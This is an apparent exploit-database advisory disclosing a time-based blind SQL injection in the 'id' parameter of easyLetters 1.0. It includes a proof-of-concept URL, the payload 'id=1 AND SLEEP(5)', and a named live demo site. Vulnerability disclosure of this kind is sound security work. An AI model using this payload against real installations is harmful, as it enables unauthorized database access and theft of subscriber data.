easyLetters 1.0 SQL Injection

easyLetters version 1.0 suffers from a remote SQL injection vulnerability.


MD5 | ae48f7315baee15c1bda23fde5295516

# Exploit Title: easyLetters 1.0 - 'id' SQL Injection
# Dork: N/A
# Date: 25.05.2018
# Exploit Author: Azkan Mustafa AkkuA (AkkuS)
# Vendor Homepage: https://codecanyon.net/item/easyletters/5281396
# Version: 1.0
# Category: Webapps
# Tested on: Kali linux
====================================================
# Demo : http://pauloreg.com/newsletter/
# PoC : SQLi :

http://test.com/newsletter/e-mails.php?id=[SQLi]

Parameter: id (GET)

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=1 AND SLEEP(5)

====================================================


Related Posts